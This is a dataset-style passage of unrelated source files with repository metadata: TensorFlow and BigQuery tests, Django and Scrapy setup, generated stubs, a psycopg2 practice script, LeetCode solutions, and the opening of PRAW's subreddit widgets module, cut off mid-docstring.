      results_without_ds = fit_eval_and_predict(
          initial_weights,
          input_fn=nods_input_fn,
          model_fn=self.get_model,
          experimental_run_tf_function=experimental_run_tf_function,
          distribution=None)
      compare_results(
          results_with_ds, results_without_ds, distribution, testcase=self)
class TestDistributionStrategyEmbeddingModelCorrectnessBase(
    TestDistributionStrategyCorrectnessBase):
  """Base class to test correctness of Keras models with embedding layers."""

  def get_data(self,
               count=(_GLOBAL_BATCH_SIZE * _EVAL_STEPS),
               min_words=5,
               max_words=10,
               max_word_id=19,
               num_classes=2):
    """Synthesizes padded word-id sequences with class-dependent word choice."""
    # One word-probability distribution per class.
    distribution = []
    for _ in range(num_classes):
      dist = np.abs(np.random.randn(max_word_id))
      dist /= np.sum(dist)
      distribution.append(dist)

    features = []
    labels = []
    for _ in range(count):
      label = np.random.randint(0, num_classes, size=1)[0]
      num_words = np.random.randint(min_words, max_words, size=1)[0]
      word_ids = np.random.choice(
          max_word_id, size=num_words, replace=True, p=distribution[label])
      word_ids = word_ids  # no-op; kept as in the original source
      labels.append(label)
      features.append(word_ids)

    features = keras.preprocessing.sequence.pad_sequences(
        features, maxlen=max_words)
    x_train = np.asarray(features, dtype=np.float32)
    y_train = np.asarray(labels, dtype=np.int32).reshape((count, 1))
    x_predict = x_train[:_GLOBAL_BATCH_SIZE]
    return x_train, y_train, x_predict
# Run any tests defined in this module when executed directly.
if __name__ == '__main__':
  test.main()
| [
"[email protected]"
]
| |
9e823061761c45f40f3539b926ffeadbb214da6c | 78ffdf4542ee11265f2190b29cef191814f0b778 | /CSDN数据挖掘培训/第二天/projy2/projy2/spiders/start.py | d7a3a28bb9bfdb405346ff6bef9374d005839973 | []
| no_license | linhuaxin93/LearnPython | c106d0c226af18d9b5b01ae97170f9cb5ca7e2b1 | c3730cdefe9179d5d1a7a46284e3be9747ababec | refs/heads/master | 2023-05-06T23:36:23.403410 | 2020-12-18T00:30:20 | 2020-12-18T00:30:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74 | py | from scrapy import cmdline
cmdline.execute(('scrapy crawl csdn'.split())) | [
"[email protected]"
]
| |
9c6962d424a390c3405c175a8872f70e709b0ce9 | 260f6aafc0ad0ddaba9d672a07ba3f2dd8822031 | /backend/doctor_24708/urls.py | cbd3997267bd3fea03835b10cc434b7fb020de29 | []
| no_license | crowdbotics-apps/doctor-24708 | 9419513611c41e4383a79a97b9e2b96d1f762919 | 74623cb899ba50ad6957cef018d61a000a2e5efb | refs/heads/master | 2023-03-09T08:48:37.840476 | 2021-02-25T04:21:40 | 2021-02-25T04:21:40 | 342,120,747 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,093 | py | """doctor_24708 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
# Top-level URL routing for the project.
urlpatterns = [
    path("", include("home.urls")),
    path("accounts/", include("allauth.urls")),
    path("modules/", include("modules.urls")),
    path("api/v1/", include("home.api.v1.urls")),
    path("admin/", admin.site.urls),
    path("users/", include("users.urls", namespace="users")),
    path("rest-auth/", include("rest_auth.urls")),
    # Override email confirm to use allauth's HTML view instead of rest_auth's API view
    path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
    path("rest-auth/registration/", include("rest_auth.registration.urls")),
    path("api/v1/", include("dating.api.v1.urls")),
    path("dating/", include("dating.urls")),
    path("home/", include("home.urls")),
]

# Branding shown in the Django admin UI.
admin.site.site_header = "doctor"
admin.site.site_title = "doctor Admin Portal"
admin.site.index_title = "doctor Admin"

# swagger
api_info = openapi.Info(
    title="doctor API",
    default_version="v1",
    description="API documentation for doctor App",
)

schema_view = get_schema_view(
    api_info,
    public=True,
    permission_classes=(permissions.IsAuthenticated,),
)

# Swagger UI is served at /api-docs/ for authenticated users only.
urlpatterns += [
    path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
| [
"[email protected]"
]
| |
740edc262fe586af8dcb9edc097db31e8e27aaf2 | eb028591eb2c22f5f00c82f901daa8ea4fd1f378 | /minio-test/config.py | 6c066d6b4b4cb6ab191848dce2c7002739f305fa | []
| no_license | matancarmeli7/cloudlet | 139c469ad778b3683ef0f379eeb66abe549c42ce | b7b57241a1f240b008ab0a9c6aa8aed02fc63b43 | refs/heads/master | 2022-12-06T19:56:00.873823 | 2021-01-03T14:30:08 | 2021-01-03T14:30:08 | 249,676,523 | 3 | 11 | null | 2022-12-06T17:38:16 | 2020-03-24T10:21:01 | HTML | UTF-8 | Python | false | false | 82 | py | bucket_name = 'mybucket-minio-test'
minio_url = 'minio.apps.dev.cloudlet-dev.com'
| [
"[email protected]"
]
| |
7efc136aaf2ae92ccc81f090ee865dba6abf2231 | 45ab4c22d918dc4390572f53c267cf60de0d68fb | /src/Analysis/Engine/Impl/Typeshed/third_party/2and3/Crypto/Util/RFC1751.pyi | 273204b24babd0a8b0f42f0ad4ca7df967b7998e | [
"MIT",
"Apache-2.0"
]
| permissive | sourcegraph/python-language-server | 580a24fd15fe9d4abeb95e9333d61db1c11a2670 | 64eae156f14aa14642afcac0e7edaf5d7c6d1a1c | refs/heads/master | 2023-04-09T21:17:07.555979 | 2018-12-06T23:25:05 | 2018-12-06T23:25:05 | 155,174,256 | 2 | 2 | Apache-2.0 | 2018-10-29T08:06:49 | 2018-10-29T08:06:49 | null | UTF-8 | Python | false | false | 168 | pyi | from typing import Any
__revision__ = ... # type: str
binary = ... # type: Any
def key_to_english(key): ...
def english_to_key(s): ...
wordlist = ... # type: Any
| [
"[email protected]"
]
| |
810b8e0187dfd900d3aaa49048955829777a39fc | 162e2588156cb2c0039c926c5c442363d9f77b00 | /tests/integration_tests/data_steward/utils/sandbox_test.py | eb5c79832b115f502c30291f17e07c1d6175b607 | [
"MIT"
]
| permissive | nishanthpp93/curation | 38be687240b52decc25ffb7b655f25e9faa40e47 | ac9f38b2f4580ae806121dd929293159132c7d2a | refs/heads/develop | 2022-08-08T20:33:53.125216 | 2021-12-03T21:38:48 | 2021-12-03T21:38:48 | 155,608,471 | 1 | 0 | MIT | 2020-10-09T01:14:39 | 2018-10-31T18:54:34 | Python | UTF-8 | Python | false | false | 2,053 | py | # Python imports
import os
import unittest
import app_identity
# Project Imports
from utils import sandbox
from utils.bq import get_client
class SandboxTest(unittest.TestCase):
    """Integration tests for sandbox dataset creation."""

    @classmethod
    def setUpClass(cls):
        print('**************************************************************')
        print(cls.__name__)
        print('**************************************************************')

    def setUp(self):
        self.project_id = app_identity.get_application_id()
        self.dataset_id = os.environ.get('UNIONED_DATASET_ID')
        self.sandbox_id = sandbox.get_sandbox_dataset_id(self.dataset_id)
        self.fq_sandbox_id = f'{self.project_id}.{self.sandbox_id}'
        # Client used both to inspect and to clean up datasets in the project.
        self.client = get_client(self.project_id)

    def test_create_sandbox_dataset(self):
        # Snapshot the datasets that exist before the call under test.
        datasets_before = [
            d.dataset_id for d in self.client.list_datasets(self.project_id)
        ]

        sandbox_dataset = sandbox.create_sandbox_dataset(
            self.project_id, self.dataset_id)

        datasets_after = [
            d.dataset_id for d in self.client.list_datasets(self.project_id)
        ]

        # The sandbox must have been created by the call, not pre-existing.
        self.assertTrue(sandbox_dataset not in datasets_before)
        self.assertTrue(sandbox_dataset in datasets_after)

        # Creating the same sandbox a second time is an error.
        self.assertRaises(RuntimeError, sandbox.create_sandbox_dataset,
                          self.project_id, self.dataset_id)

    def tearDown(self):
        # Remove the dataset created during the test, ignoring absence.
        self.client.delete_dataset(self.fq_sandbox_id,
                                   delete_contents=True,
                                   not_found_ok=True)
| [
"[email protected]"
]
| |
0a02e0e66c2bc59500b508dbfc467fcab4c3580d | 6febd920ced70cbb19695801a163c437e7be44d4 | /leetcode_oj/tree/lowest_common_ancestor.py | 36f0233451b0db28999def6a1c089ac431795fcf | []
| no_license | AngryBird3/gotta_code | b0ab47e846b424107dbd3b03e0c0f3afbd239c60 | b9975fef5fa4843bf95d067bea6d064723484289 | refs/heads/master | 2021-01-20T16:47:35.098125 | 2018-03-24T21:31:01 | 2018-03-24T21:31:01 | 53,180,336 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,814 | py | #!/usr/bin/python
'''
Find the least common ancestor in binary tree
'''
class TreeNode:
def __init__(self, val, l = None, r = None):
self.val = val
self.l = l
self.r = r
class Solution:
def findAncestor(self, tree, node1, node2):
if not node1 or not node2:
return None
node1_path = list()
node2_path = list()
if not self.find_path(tree, node1, node1_path) or \
not self.find_path(tree, node2, node2_path):
return None
print node1_path
print node2_path
#Find the first index where path doesn't match
i = 0
while (i < len(node1_path) and i < len(node2_path)):
if node1_path[i] != node2_path[i]:
break
i += 1
return node1_path[i-1]
def find_path(self, t, n, path):
if not t:
return False
path.append(t.val)
if n == t.val:
return True
if (t.l and self.find_path(t.l, n, path)) or (t.r and self.find_path(t.r, n, path)):
return True
path.pop()
return False
def lowestCommonAncestor(self, root, p, q):
if not root:
return None
if root == p or root == q:
return root
matching_left = self.lowestCommonAncestor(root.l, p, q)
matching_right = self.lowestCommonAncestor(root.r, p, q)
print "root : ", root.val, " m_l: ", matching_left.val if matching_left else "None", \
" m_r: ", matching_right.val if matching_right else "None"
#If both match, root is LCA
if matching_left and matching_right:
return root
#Found both the node on one side
return matching_left if matching_left else matching_right
s = Solution()
t8 = TreeNode(8, None, None)
t0 = TreeNode(0, None, None)
t1 = TreeNode(1, t0, t8)
t4 = TreeNode(4, None, None)
t7 = TreeNode(7, None, None)
t2 = TreeNode(2, t7, t4)
t6 = TreeNode(6, None, None)
t5 = TreeNode(5, t6, t2)
root = TreeNode(3, t5, t1)
print s.lowestCommonAncestor(root, t6, t4)
| [
"[email protected]"
]
| |
d7d6f389f59d7fc45035df1e7604d1558f038bec | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Clutter/ListModelClass.py | 9a7881b11b60fa1641da7dea25a2aa64f7fc3bcc | []
| no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 4,616 | py | # encoding: utf-8
# module gi.repository.Clutter
# from /usr/lib64/girepository-1.0/Clutter-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.Atk as __gi_repository_Atk
import gi.repository.GObject as __gi_repository_GObject
import gobject as __gobject
class ListModelClass(__gi.Struct):
"""
:Constructors:
::
ListModelClass()
"""
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self): # real signature unknown; restored from __doc__
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
parent_class = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(ListModelClass), '__module__': 'gi.repository.Clutter', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'ListModelClass' objects>, '__weakref__': <attribute '__weakref__' of 'ListModelClass' objects>, '__doc__': None, 'parent_class': <property object at 0x7f541351b180>})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(ListModelClass)
| [
"[email protected]"
]
| |
ae10124f9637a093727bec5c3a8a47e836fbb458 | ad01faab6dd663dc5193eb8383fdc2d24c2df23d | /_psycopg2/main.py | 0da670d63333ca337b3b928c0fb107341902ee35 | []
| no_license | jurgeon018/snippets | 585db91b8120076b37deaa37393b34f7c61fec66 | e0ab24a99791c3b25422a3208f02919cf98ca084 | refs/heads/master | 2023-05-14T12:31:48.139452 | 2023-01-23T03:33:41 | 2023-01-23T03:33:41 | 222,001,233 | 0 | 0 | null | 2023-05-01T22:16:48 | 2019-11-15T20:51:27 | Python | UTF-8 | Python | false | false | 1,949 | py | import psycopg2
import psycopg2.extras
import psycopg2.errors
conn = psycopg2.connect(
database='psycopg2_test_db',
user='jurgeon',
password='69018',
host='127.0.0.1',
port=5432,
)
cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
# cur.execute('''
# create table users (id serial primary key, login varchar(64), password varchar(64))
# ''')
cur.execute("INSERT INTO users (login, password) VALUES (%s, %s)",
("afiskon", "123"))
cur.execute("INSERT INTO users (login, password) VALUES (%s, %s)",
("eax", "456"))
cur.execute(
"UPDATE users SET password = %(password)s WHERE login = %(login)s",
{"login":"eax", "password":"789"}
)
cur.execute("DELETE FROM users WHERE id = %s", (2,))
cur.execute("PREPARE insuser AS " +
"INSERT INTO users (login, password) VALUES ($1, $2)")
cur.execute("EXECUTE insuser(%s, %s)", ("afiskon", "123"))
cur.execute("EXECUTE insuser(%s, %s)", ("eax", "456"))
conn.commit()
cur.execute("SELECT version()")
cur.execute('SELECT * FROM users LIMIT 10')
print(cur.fetchone())
records = cur.fetchall()
# for record in records:
# # print(dict(record.items()))
# print(record['login'])
with conn:
with conn.cursor() as cur:
cur.close()
conn.close()
'''
# створює юзера в БД. Вводити 1 раз перед початком розробки.
sudo -u postgres psql -c "create user jurgeon with password '69018'; alter role jurgeon set client_encoding to 'utf8'; alter role jurgeon set default_transaction_isolation to 'read committed'; alter role jurgeon set timezone to 'UTC';"
# це не чіпай
#####sudo -u postgres psql -c 'create database psycopg2_test_db;'
#####sudo -u postgres psql -c 'grant all privileges on database psycopg2_test_db to jurgeon;'
# видаляє БД
sudo -u postgres psql -c "drop database eleek; "
# створює БД
sudo -u postgres psql -c "create database eleek owner jurgeon; "
''' | [
"[email protected]"
]
| |
daa62f58f170435922812b7e0cd13136bcac3329 | b1cf54e4d6f969d9084160fccd20fabc12c361c2 | /leetcode/first_bad_version.py | a240686a6a5620942a6e98d87cbde784e6963a9c | []
| no_license | zarkle/code_challenges | 88a53477d6f9ee9dd71577678739e745b9e8a694 | 85b7111263d4125b362184df08e8a2265cf228d5 | refs/heads/master | 2021-06-10T11:05:03.048703 | 2020-01-23T06:16:41 | 2020-01-23T06:16:41 | 136,668,643 | 0 | 1 | null | 2019-02-07T23:35:59 | 2018-06-08T21:44:26 | JavaScript | UTF-8 | Python | false | false | 1,159 | py | # https://leetcode.com/problems/first-bad-version/
# https://leetcode.com/articles/first-bad-version/
# The isBadVersion API is already defined for you.
# @param version, an integer
# @return a bool
# def isBadVersion(version):
class Solution:
def firstBadVersion(self, n):
"""
:type n: int
:rtype: int
"""
first = 0
last = n
while first <= last:
mid = (first + last) // 2
if isBadVersion(mid):
last = mid - 1
else:
first = mid + 1
return first
# 32 ms, 99.8%
# The isBadVersion API is already defined for you.
# @param version, an integer
# @return a bool
# def isBadVersion(version):
class Solution:
def firstBadVersion(self, n):
"""
:type n: int
:rtype: int
"""
first = 0
last = n
while first <= last:
mid = (first + last) // 2
if isBadVersion(mid) == True:
if isBadVersion(mid - 1) == False:
return mid
last = mid - 1
else:
first = mid + 1 | [
"[email protected]"
]
| |
8eef03e3062bcf936292ffcfe46b96d9859fc508 | 6ccb55befcbc69caa351b8337fdd40e55dbb802f | /venv/lib/python3.6/site-packages/praw/models/reddit/widgets.py | ad88158d6b187165598c7fa4f54b8ee1cd43a608 | []
| no_license | FiacreT/M-moire | cc0791cbf98bf565ea637e6ec409611bcc596c57 | 4089755191ffc848614247e98bbb641c1933450d | refs/heads/master | 2022-12-12T21:55:23.679854 | 2019-09-06T23:28:03 | 2019-09-06T23:28:03 | 187,702,532 | 2 | 2 | null | 2022-12-08T01:04:58 | 2019-05-20T19:39:21 | Python | UTF-8 | Python | false | false | 67,584 | py | """Provide classes related to widgets."""
import os.path
from json import dumps, JSONEncoder
from ...const import API_PATH
from ..base import PRAWBase
from ..list.base import BaseList
class Button(PRAWBase):
    """Class to represent a single button inside a :class:`.ButtonWidget`.

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``color``               The hex color used to outline the button.
    ``height``              Image height. Only present on image buttons.
    ``hoverState``          A ``dict`` describing the state of the button when
                            hovered over. Optional.
    ``kind``                Either ``'text'`` or ``'image'``.
    ``linkUrl``             A link that can be visited by clicking the button.
                            Only present on image buttons.
    ``text``                The text displayed on the button.
    ``url``                 If the button is a text button, a link that can be
                            visited by clicking the button.

                            If the button is an image button, the URL of a
                            Reddit-hosted image.
    ``width``               Image width. Only present on image buttons.
    ======================= ===================================================
    """
class Image(PRAWBase):
    """Class to represent an image that's part of a :class:`.ImageWidget`.

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``height``              Image height.
    ``linkUrl``             A link that can be visited by clicking the image.
    ``url``                 The URL of the (Reddit-hosted) image.
    ``width``               Image width.
    ======================= ===================================================
    """
class ImageData(PRAWBase):
    """Class for image data that's part of a :class:`.CustomWidget`.

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``height``              The image height.
    ``name``                The image name.
    ``url``                 The URL of the image on Reddit's servers.
    ``width``               The image width.
    ======================= ===================================================
    """
class MenuLink(PRAWBase):
    """Class to represent a single link inside a menu or submenu.

    A :class:`.MenuLink` appears either directly in a :class:`.Menu` widget
    or nested inside a :class:`.Submenu`.

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``text``                The text of the menu link.
    ``url``                 The URL that the menu item links to.
    ======================= ===================================================
    """
class Submenu(BaseList):
    r"""Class to represent a submenu of links inside a menu.

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``children``            A list of the :class:`.MenuLink`\ s in this
                            submenu. Can be iterated over by iterating over the
                            :class:`.Submenu` (e.g. ``for menu_link in
                            submenu``).
    ``text``                The name of the submenu.
    ======================= ===================================================
    """

    # BaseList delegates iteration/indexing to the attribute named here, so
    # iterating a Submenu yields the MenuLinks stored in ``children``.
    CHILD_ATTRIBUTE = "children"
class SubredditWidgets(PRAWBase):
    """Class to represent a subreddit's widgets.

    Create an instance like so:

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets

    Data will be lazy-loaded. By default, PRAW will not request progressively
    loading images from Reddit. To enable this, instantiate a SubredditWidgets
    object, then set the attribute ``progressive_images`` to ``True`` before
    performing any action that would result in a network request.

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets
       widgets.progressive_images = True
       for widget in widgets.sidebar:
           # do something

    Access a subreddit's widgets with the following attributes:

    .. code-block:: python

       print(widgets.id_card)
       print(widgets.moderators_widget)
       print(widgets.sidebar)
       print(widgets.topbar)

    The attribute :attr:`.id_card` contains the subreddit's ID card,
    which displays information like the number of subscribers.

    The attribute :attr:`.moderators_widget` contains the subreddit's
    moderators widget, which lists the moderators of the subreddit.

    The attribute :attr:`.sidebar` contains a list of widgets which make up
    the sidebar of the subreddit.

    The attribute :attr:`.topbar` contains a list of widgets which make up
    the top bar of the subreddit.

    To edit a subreddit's widgets, use :attr:`~.SubredditWidgets.mod`. For
    example:

    .. code-block:: python

       widgets.mod.add_text_area('My title', '**bold text**',
                                 {'backgroundColor': '#FFFF66',
                                  'headerColor': '#3333EE'})

    For more information, see :class:`.SubredditWidgetsModeration`.

    To edit a particular widget, use ``.mod`` on the widget. For example:

    .. code-block:: python

       for widget in widgets.sidebar:
           widget.mod.update(shortName='Exciting new name')

    For more information, see :class:`.WidgetModeration`.

    **Currently available Widgets**:

    - :class:`.ButtonWidget`
    - :class:`.Calendar`
    - :class:`.CommunityList`
    - :class:`.CustomWidget`
    - :class:`.IDCard`
    - :class:`.ImageWidget`
    - :class:`.Menu`
    - :class:`.ModeratorsWidget`
    - :class:`.PostFlairWidget`
    - :class:`.RulesWidget`
    - :class:`.TextArea`
    """

    @property
    def id_card(self):
        """Get this subreddit's :class:`.IDCard` widget."""
        # Cached after first access; ``items``/``layout`` trigger a network
        # fetch via __getattr__ if data has not been loaded yet.
        if self._id_card is None:
            self._id_card = self.items[self.layout["idCardWidget"]]
        return self._id_card

    @property
    def items(self):
        """Get this subreddit's widgets as a dict from ID to widget."""
        # Objectify the raw widget dicts lazily, exactly once. Each widget
        # is given a ``subreddit`` attribute so its ``.mod`` helper works.
        if self._items is None:
            self._items = {}
            for item_name, data in self._raw_items.items():
                data["subreddit"] = self.subreddit
                self._items[item_name] = self._reddit._objector.objectify(data)
        return self._items

    @property
    def mod(self):
        """Get an instance of :class:`.SubredditWidgetsModeration`.

        .. note::

           Using any of the methods of :class:`.SubredditWidgetsModeration`
           will likely result in the data of this :class:`.SubredditWidgets`
           being outdated. To re-sync, call :meth:`.refresh`.
        """
        if self._mod is None:
            self._mod = SubredditWidgetsModeration(
                self.subreddit, self._reddit
            )
        return self._mod

    @property
    def moderators_widget(self):
        """Get this subreddit's :class:`.ModeratorsWidget`."""
        if self._moderators_widget is None:
            self._moderators_widget = self.items[
                self.layout["moderatorWidget"]
            ]
        return self._moderators_widget

    @property
    def sidebar(self):
        """Get a list of Widgets that make up the sidebar."""
        # ``layout`` determines widget ordering; resolve each ID to the
        # objectified widget.
        if self._sidebar is None:
            self._sidebar = [
                self.items[widget_name]
                for widget_name in self.layout["sidebar"]["order"]
            ]
        return self._sidebar

    @property
    def topbar(self):
        """Get a list of Widgets that make up the top bar."""
        if self._topbar is None:
            self._topbar = [
                self.items[widget_name]
                for widget_name in self.layout["topbar"]["order"]
            ]
        return self._topbar

    def refresh(self):
        """Refresh the subreddit's widgets.

        By default, PRAW will not request progressively
        loading images from Reddit. To enable this,
        set the attribute ``progressive_images`` to ``True`` prior to
        calling ``refresh()``.

        .. code-block:: python

           widgets = reddit.subreddit('redditdev').widgets
           widgets.progressive_images = True
           widgets.refresh()
        """
        self._fetch()

    def __getattr__(self, attr):
        """Return the value of ``attr``, fetching data on first access.

        Only called for attributes not already present on the instance.
        Non-private attributes trigger a one-time fetch; if the attribute
        is still missing afterwards, an :class:`AttributeError` is raised
        (``_fetched`` is then ``True``, so there is no infinite recursion).
        """
        if not attr.startswith("_") and not self._fetched:
            self._fetch()
            return getattr(self, attr)
        raise AttributeError(
            "{!r} object has no attribute {!r}".format(
                self.__class__.__name__, attr
            )
        )

    def __init__(self, subreddit):
        """Initialize the class.

        :param subreddit: The :class:`.Subreddit` the widgets belong to.
        """
        # set private variables used with properties to None.
        self._id_card = self._moderators_widget = self._sidebar = None
        self._topbar = self._items = self._raw_items = self._mod = None
        self._fetched = False
        self.subreddit = subreddit
        self.progressive_images = False
        super(SubredditWidgets, self).__init__(subreddit._reddit, {})

    def __repr__(self):
        """Return an object initialization representation of the object."""
        return "SubredditWidgets(subreddit={subreddit!r})".format(
            subreddit=self.subreddit
        )

    def _fetch(self):
        # Fetch all widget data in a single request. "items" (widget ID ->
        # raw widget dict) is kept aside and objectified lazily by the
        # ``items`` property; the remainder (e.g. "layout") becomes
        # instance attributes via PRAWBase.__init__.
        data = self._reddit.get(
            API_PATH["widgets"].format(subreddit=self.subreddit),
            params={"progressive_images": self.progressive_images},
        )
        self._raw_items = data.pop("items")
        super(SubredditWidgets, self).__init__(self.subreddit._reddit, data)
        # reset private variables used with properties to None.
        self._id_card = self._moderators_widget = self._sidebar = None
        self._topbar = self._items = None
        self._fetched = True
class SubredditWidgetsModeration(object):
    """Class for moderating a subreddit's widgets.

    Get an instance of this class from :attr:`.SubredditWidgets.mod`.

    Example usage:

    .. code-block:: python

       styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
       reddit.subreddit('learnpython').widgets.mod.add_text_area(
           'My title', '**bold text**', styles)

    .. note::

       To use this class's methods, the authenticated user must be a moderator
       with appropriate permissions.
    """
def __init__(self, subreddit, reddit):
"""Initialize the class."""
self._subreddit = subreddit
self._reddit = reddit
def _create_widget(self, payload):
path = API_PATH["widget_create"].format(subreddit=self._subreddit)
widget = self._reddit.post(path, data={"json": dumps(payload)})
widget.subreddit = self._subreddit
return widget
def add_button_widget(
self, short_name, description, buttons, styles, **other_settings
):
r"""Add and return a :class:`.ButtonWidget`.
:param short_name: A name for the widget, no longer than 30 characters.
:param description: Markdown text to describe the widget.
:param buttons: A ``list`` of ``dict``\ s describing buttons, as
specified in `Reddit docs`_. As of this writing, the format is:
Each button is either a text button or an image button. A text
button looks like this:
.. code-block:: none
{
"kind": "text",
"text": a string no longer than 30 characters,
"url": a valid URL,
"color": a 6-digit rgb hex color, e.g. `#AABBCC`,
"textColor": a 6-digit rgb hex color, e.g. `#AABBCC`,
"fillColor": a 6-digit rgb hex color, e.g. `#AABBCC`,
"hoverState": {...}
}
An image button looks like this:
.. code-block:: none
{
"kind": "image",
"text": a string no longer than 30 characters,
"linkUrl": a valid URL,
"url": a valid URL of a reddit-hosted image,
"height": an integer,
"width": an integer,
"hoverState": {...}
}
Both types of buttons have the field ``hoverState``. The field does
not have to be included (it is optional). If it is included, it can
be one of two types: text or image. A text ``hoverState`` looks
like this:
.. code-block:: none
{
"kind": "text",
"text": a string no longer than 30 characters,
"color": a 6-digit rgb hex color, e.g. `#AABBCC`,
"textColor": a 6-digit rgb hex color, e.g. `#AABBCC`,
"fillColor": a 6-digit rgb hex color, e.g. `#AABBCC`
}
An image ``hoverState`` looks like this:
.. code-block:: none
{
"kind": "image",
"url": a valid URL of a reddit-hosted image,
"height": an integer,
"width": an integer
}
.. note::
The method :meth:`.upload_image` can be used to upload images to
Reddit for a ``url`` field that holds a Reddit-hosted image.
.. note::
An image ``hoverState`` may be paired with a text widget, and a
text ``hoverState`` may be paired with an image widget.
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor':
'#3333EE'}``.
.. _Reddit docs: https://www.reddit.com/dev/api#POST_api_widget
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
my_image = widget_moderation.upload_image('/path/to/pic.jpg')
buttons = [
{
'kind': 'text',
'text': 'View source',
'url': 'https://github.com/praw-dev/praw',
'color': '#FF0000',
'textColor': '#00FF00',
'fillColor': '#0000FF',
'hoverState': {
'kind': 'text',
'text': 'ecruos weiV',
'color': '#FFFFFF',
'textColor': '#000000',
